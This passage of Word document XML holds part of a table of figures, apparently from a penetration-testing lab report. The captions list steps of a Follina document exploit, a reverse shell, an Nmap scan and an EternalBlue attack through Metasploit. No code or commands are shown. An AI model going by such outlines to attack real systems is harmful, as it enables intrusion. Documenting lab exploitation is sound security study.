          </w:rPr>
          <w:t>Figure 73: Creation of the Follina.doc</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981798 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>83</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6308DB7D" w14:textId="7607690C"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799" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 74: Kali IP Address</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981799 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>84</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="65D92F7D" w14:textId="1B7D45F2"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00" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 75: Creation of a Python Server</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981800 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>84</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="57FFA986" w14:textId="4C041FB3"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01" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 76: Download 'follina.doc' onto victim machine</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981801 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>85</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="06174EBA" w14:textId="37810659"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02" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 77: Connecting to the Server to open follina.doc</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981802 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>85</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4733EF44" w14:textId="23AC8F9A"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03" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 78: Connecting to the Python Server</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981803 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>86</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2E6ED84C" w14:textId="62B7F03F"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04" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 79: Enable Editing</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981804 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>86</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D6CB838" w14:textId="20FE360E"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05" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 80: Calculator opened</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981805 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>86</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7EE429A9" w14:textId="016EE5EB"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06" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 81: Follina.py Notepad Execution</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981806 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>87</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="121F3933" w14:textId="7400D3A8"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07" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 82: Notepad executed</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981807 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>87</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="52E2164B" w14:textId="3CF9C715"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08" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 83: Reverse Shell using Follina</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981808 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>87</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="467E2100" w14:textId="0F5DDFF4"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09" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 84: Nmap scan of vulnerable machine</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981809 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>88</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FC4CA19" w14:textId="0A8305CA"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10" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 85: Download script from Github</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981810 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>89</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B8A1DC3" w14:textId="13E44F2C"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11" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 86: Target is confirmed vulnerable</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981811 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>89</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2CA4A545" w14:textId="6B2E2E2B"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12" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 87: Metasploit</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981812 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>90</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="43652367" w14:textId="615AE817"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13" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 88: Check for EternalBlue in Metasploit Framework</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981813 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>90</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1A0C105F" w14:textId="034E988D"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14" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 89: EternalBlue exploit set up</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981814 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>90</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5BDCB9D8" w14:textId="04B42B3D"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15" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 90: EternalBlue has established a connection</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981815 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>91</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3DD26930" w14:textId="78CEACEC"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16" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 91: User information on target machine</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981816 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>92</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C1A287C" w14:textId="68D80BB7"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17" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 92: Shell and ‘whoami’</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981817 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
